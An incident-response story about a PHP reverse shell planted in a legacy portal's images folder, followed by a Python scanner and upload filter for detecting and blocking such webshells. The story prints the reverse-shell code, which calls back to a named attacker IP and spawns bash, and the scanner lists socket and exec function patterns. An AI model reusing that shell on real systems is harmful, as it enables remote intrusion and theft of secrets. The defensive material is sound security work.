The Legacy Server and the 3 AM Wake-Up Call

Last week, a scanner had found it. She'd logged the ticket as "Low Priority."

At the post-mortem, her manager asked, "How could we have caught this sooner?"

PHP reverse shell:

```php
<?php
// A minimal, dangerous reverse shell
set_time_limit(0);
$ip = '185.143.223.12'; // Attacker's server
$port = 4444;
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) die();
shell_exec('/bin/bash -i <&3 >&3 2>&3');
?>
```

The attacker had simply browsed to https://legacy-portal.com/images/logo_cache.php. The script called back to their listening netcat session. From there, they ran whoami and ls -la, and began exploring her database config file.

And if you ever see a call to fsockopen followed by a shell command in your logs? That's not a bug. That's a break-in in progress.

Maya's hands moved fast. She killed the outbound connection at the firewall, took the portal offline, and rotated every secret. By dawn, she had removed the shell, fixed the upload filter, and pushed a WAF rule to block fsockopen and exec in any uploaded file.
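Two of the controls in the story, the "fsockopen followed by a shell command" indicator and the repaired upload filter, can be turned into something a responder can actually run. The script below is an added example, not code from the original story or from any real product. It assumes a hypothetical webroot layout in which the images/ and uploads/ directories should only ever hold static files, and it builds its own constructed sample tree (one benign PHP page that opens an SMTP socket without running a command, one image, and one planted PHP file in images/ whose body is a non-functional placeholder) so it runs offline.

```python
"""Post-incident checks for a PHP webshell planted under a static directory.

Added example (hypothetical layout, constructed sample files); not the page's code.
  scan_webroot      - flags PHP files in static-only directories, and PHP files that
                      open an outbound socket and then call a command-execution function
  is_upload_allowed - the upload filter: image extensions only, no PHP extension
                      anywhere in the name, no PHP open tag in the content
"""
import os
import re
import tempfile
from typing import List, Tuple

# PHP built-ins that open an outbound connection, and ones that run a command.
# A file calling one from each group is flagged; either group alone is normal code.
NETWORK_CALLS = r"fsockopen|pfsockopen|stream_socket_client|socket_create"
EXEC_CALLS = r"shell_exec|exec|system|passthru|popen|proc_open"
SOCKET_THEN_EXEC = re.compile(
    rf"\b(?:{NETWORK_CALLS})\s*\(.*?\b(?:{EXEC_CALLS})\s*\(",
    re.DOTALL | re.IGNORECASE,
)

# Extensions the PHP handler executes; also used to catch "logo.php.jpg"-style names.
PHP_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}
# Assumption for this example: these top-level directories hold static content only.
STATIC_DIRS = {"images", "uploads"}
ALLOWED_UPLOAD_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

Finding = Tuple[str, str]  # (path relative to webroot, reason)


def scan_webroot(root: str) -> List[Finding]:
    """Walk a web-served tree and report webshell indicators, sorted for stable output."""
    findings: List[Finding] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if ext not in PHP_EXTENSIONS:
                continue  # only server-executable files are of interest here
            top_dir = rel.split("/", 1)[0] if "/" in rel else ""
            if top_dir in STATIC_DIRS:
                findings.append((rel, "php_in_static_dir"))
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                source = fh.read()
            if SOCKET_THEN_EXEC.search(source):
                findings.append((rel, "socket_then_exec"))
    return sorted(findings)


def is_upload_allowed(filename: str, head: bytes) -> bool:
    """Upload filter: final extension must be an image type, no PHP extension may
    appear anywhere in the name, and the leading bytes must not open a PHP tag."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or parts[-1] not in ALLOWED_UPLOAD_EXTENSIONS:
        return False
    if any(p in PHP_EXTENSIONS for p in parts[1:]):
        return False
    if b"<?php" in head or b"<?=" in head:
        return False
    return True


def build_sample_webroot() -> str:
    """Create a constructed webroot in a temp dir. The planted file under images/
    uses placeholder arguments and is not a working shell."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "images"))
    samples = {
        # Benign: opens a socket to a mail relay but never executes a command.
        "index.php": b"<?php\n$m = fsockopen('smtp.example.invalid', 25);\nfwrite($m, \"EHLO\\r\\n\");\n",
        "images/logo.png": b"\x89PNG\r\n\x1a\n",
        # Constructed indicator file: socket open followed by a command-execution call.
        "images/logo_cache.php": b"<?php\n$s = fsockopen('PLACEHOLDER_HOST', 0);\nshell_exec('PLACEHOLDER');\n",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    for rel, reason in scan_webroot(root):
        print(f"{reason:20} {rel}")
    for name, head in [("logo.png", b"\x89PNG"), ("logo_cache.php", b"<?php")]:
        print(name, "allowed" if is_upload_allowed(name, head) else "rejected")
```

Running it flags images/logo_cache.php twice (a PHP file where only images belong, and a socket open followed by an exec-family call) while leaving index.php alone, which is the difference between a mail helper and a callback shell. The upload filter rejects both the obvious logo_cache.php and the double-extension logo.php.png case, and rejects a .png whose bytes begin with a PHP open tag; pairing that with a web-server rule that refuses to execute PHP under images/ at all is the usual belt-and-braces fix.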